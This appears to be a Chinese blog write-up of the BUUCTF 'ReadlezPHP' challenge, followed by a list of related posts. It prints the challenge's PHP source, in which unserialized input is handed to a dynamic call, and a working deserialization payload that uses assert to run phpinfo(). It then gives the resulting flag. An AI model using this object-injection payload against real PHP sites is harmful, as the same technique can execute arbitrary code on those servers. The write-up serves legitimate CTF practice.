BUUCTF——ReadlezPHP

BUUCTF------ReadlezPHP

进入靶场

看了看框架和源码信息

没有什么可以利用的地方

爆破一下目录看看

结果只出来个index.php

看了一下Findsomthing

报了个路径

复制代码
/time.php?source

拼接访问一下

出了个php代码

php 复制代码
<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

代码结构分析

  1. 类定义 - HelloPhp 类:
    • 属性 :
      • public $a
      • public $b
    • 构造函数 __construct() :
      • 初始化 $this->a = "Y-m-d h:i:s" (日期格式字符串)
      • 初始化 $this->b = "date" (PHP日期函数名)
    • 析构函数 __destruct() :
      • $this->a 赋值给 $a
      • $this->b 赋值给 $b
      • 执行 $b($a) 并输出结果 (动态函数调用)
  2. 实例化 :
    • $c = new HelloPhp 创建了一个默认的 HelloPhp 对象
  3. 源代码查看功能 :
    • 如果 GET 参数 source 存在,则显示当前文件源代码并退出
  4. 反序列化入口 :
    • @$ppp = unserialize($_GET["data"]) 从 GET 参数 data 反序列化数据

构造反序列化payload

php 复制代码
<?php
class HelloPhp
{
    public $a='phpinfo()';
    public $b='assert';

}
$c = new HelloPhp;
echo(serialize($c));

拿到反序列化代码

构造payload

复制代码
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

进入phpinfo 翻翻配置信息

翻到好东西了

复制代码
flag{6fcec1e0-69df-46c7-a734-22b02c305449}

直接下播!!!

相关推荐
云边有个稻草人1 天前
Rust 借用分割技巧:安全解构复杂数据结构
数据结构·安全·rust
Cyyyy_g1 天前
【2025 SWPU-NSSCTF 秋季训练赛】WebFTP
安全·网络安全
平凡的学者1 天前
RustyKey
网络安全·hackthebox
unable code1 天前
攻防世界-Misc-pdf
网络安全·ctf·misc·1024程序员节
Wang's Blog1 天前
Nestjs框架: gRPC微服务通信及安全实践全解析
安全·微服务·架构·nestjs
Jing_jing_X1 天前
springcloud:理解springsecurity安全架构与认证链路(一)
spring·spring cloud·安全架构
MicroTech20251 天前
微算法科技(NASDAQ MLGO):以隐私计算区块链筑牢多方安全计算(MPC)安全防线
科技·安全·区块链
网安小白的进阶之路1 天前
A模块 系统与网络安全 第四门课 弹性交换网络-4
网络·web安全·php
落一落,掉一掉1 天前
第十五周Fscan和利用漏洞上线远程和数据库提权上线远控
安全·web安全
深耕AI1 天前
【端口的核心区别】阿里云安全组:80、443和16251
安全·阿里云·云计算